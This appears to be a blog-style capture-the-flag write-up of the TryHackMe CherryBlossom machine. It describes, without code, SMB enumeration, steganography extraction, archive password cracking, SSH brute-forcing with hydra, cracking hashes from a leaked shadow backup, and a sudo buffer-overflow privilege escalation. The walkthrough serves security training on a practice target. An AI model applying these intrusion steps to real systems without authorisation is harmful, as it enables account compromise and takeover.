Tryhackme CherryBlossom Writeup
Write-up by Akshay Shinde
CherryBlossom is a boot2root machine on tryhackme. Tryhackme is a great platform for those who want to improve their CTFs skills.
Difficulty: Hard
In this machine, we gotta submit three flags : Journal flag,user flag and the root flag.Let’s start off by scanning the machine for open ports.
Here, we have got 3 ports to be opened.Starting with SSH, we don’t really need to enumerate that for now. To enumerate the samba shares we can make the use of tool : enum4linux
I got a lot of info about the shares and the users present in the machine.To give a few details, here are the names of the users and samba share listings.
So as we have Anonymous File Server share, we can try to look in for some stuffs. To list or access the shares, we can use smbclient.
We have this journal.txt and after opening that file, I found out that this text file contains a base64 encoded image. To decode we can make the use of any online tool or command line. I will be using command line for this one.
Now that we have converted it into the image, we can perform some stego related strategies. I got to know about this DominicBreukar from the hint that was given. We will be using stegpy to get the hidden contents from the image.
Here, as we can see that after getting the .zip file from the image, we found out that the data is in the form of JPEG. So to convert this jpeg into a zip file, we actually have to change the headers to something like 50 4B 03 04.
So after changing the header of the jpeg file, we finally got the zip file that we wanted.
Here, the zip file was asking for a password, so to crack the password we can use fcrackzip which is a great tool for cracking zip passwords.
Okay here we go again, the file that we got after extracting from _journal.zip is a 7-zip archive. And to crack the password for this one, we have to use 7z2john.pl. Follow me 😧
So we got this Journal.ctd which is a file that can be opened using Cherry tree and you can install cherry tree using : sudo apt-get install cherrytree
As you can that the user is writing something in this Diary regarding custom passwords.He has created a custom password list and his girlfriend’s name is lily. We enumerated the users on this machine earlier and lily was one of the user.
So now we can try to brute force the SSH login as lily using hydra.To get the word list, we can simply download it from the cherry-tree.
Now that we have the password, lets try to login via SSH.
Okay we are in. We need to find something to get the privileges as johan. I found this shadow.bak that contains the hashes. Cool 🚀
We can crack the password for johan using that cherry-blossom word list.
Privilege Escalation: (Exploiting Sudo Buffer Overflow)
I found out this strange thing while inserting password for sudo -l. I have completed this room earlier on tryhackme which covers this vulerability. Sudo Buffer Overflow : Do check it out.
To exploit this we need to download this exploit.c file, but unfortunately we don’t have gcc compiler present in our system. So instead we will compile it in the attacker machine and then transfer into the victim machine.
Thank you 😸 Happy Hacking 💻 🚀
